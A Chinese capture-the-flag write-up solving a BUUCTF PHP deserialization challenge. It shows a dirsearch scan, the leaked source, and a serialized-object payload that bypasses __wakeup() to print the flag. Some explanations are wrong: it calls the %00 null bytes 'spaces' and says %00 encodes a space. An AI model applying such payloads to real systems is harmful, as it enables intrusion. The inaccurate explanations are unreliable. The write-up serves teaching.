[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂

今天来做以下buuctf里面的  [极客大挑战 2019]PHP

这道题主要考到了php的反序列化

话不多说开始演示（小白也能看懂哦）

打开链接我们可以看到一只乱动的小猫

他说：每次小猫都会在键盘上乱跳，所以我有一个良好的备份习惯。

这里我们可以获取到在这个网页中还存在着一个备份网站

于是我们用dirsezrch扫一下（这个工具在kali里面）

dirsearch -u http://f3c1575a-0f81-42eb-bc0d-21f70ac635b0.node4.buuoj.cn:81
 

然后我们发现了一个www.zip文件把他下载下来 （直接在url网址后面拼接就可以）

然后我们得到了5个文件，打开看看

flag不可能存在这么明显的地方，根本不用试

index.php

 <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

从这里我们可以知道 传参方式为GET传参

传的值是select

 $res=unserialize(@$select);  这段代码的作用是将一个字符串反序列化为一个PHP变量。

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
// __wakeup  在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup()
所以我们要将 2 改为 3 或者 比2大的数字

同时，我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

在这个里面我们可以知道

username=admin

password=100

然后开始编写我们的反序列化代码，构造我们的payload

<?php

class Name{
	private $username = 'admin';
	private $password =  '100';
}

$select = new Name();
$res = serialize(@$select);
echo $res

//$select = new Name();
这段代码创建了一个名为$select的新对象，该对象是通过调用Name类的构造函数来实例化的
1. 创建一个新的对象$select。 
2. 使用关键字new来实例化对象。 
3. 实例化对象时调用Name类的构造函数，该构造函数可能包含一些初始化代码或设置对象的初始状态。 
 
总结：这段代码创建了一个新的Name对象$select，并调用了该对象的构造函数来初始化对象。

?>

//$res=unserialize(@$select);
这段代码的作用是将一个字符串反序列化为一个PHP变量。 
 
代码的步骤如下： 
1. @$select 表示选择变量$select的值，如果$select存在则取其值，否则返回空值。 
2. unserialize() 函数将字符串反序列化为一个PHP变量。 
3. 将反序列化后的结果赋值给$res变量。

然后我们拿到本地去跑一下，得到了一串东西，这就是反序列化的代码，也是我们需要传参的payload

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

解读一下
O:表示对象            O表示对象,1表示对象名的字符串长度,'a'是对象名，0是对象内属性个数 1
4:代表的是你定义的类  这里是定义了一个名为Name的类  有四个字符串
2是对象内属性的个数  
s: 代表的字符串
14：代表的字符串的长度
而我们的Nameusername 只有12个字符，这里的14怎么来的呢？
大家可以理解为Name 和username 是拼接起来的 所以在Name和username这里各有一个空格，所以就是14个字符了
后面的意思都一样了
但是我们拿着这串反序列化代码去执行的时候还是找不到flag

就是我们的空格没有被实体化  这里我们需要把空格写出来
而空格的url编码是%00，下面构造我们的payload

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

然后拿着去url后面去拼接就可以得到我们的flag啦！

至于上面那个2是怎么变成3的

 __wakeup  在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup()
所以我们要将 2 改为 3 或者 比2大的数字

同时，我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
 

就是这样啦！到此这道题就接完了。

又什么问题小伙伴及时在品论去留言哦！

或者有不会的题也可以在评论区留言，我会及时给你们出解题思路的！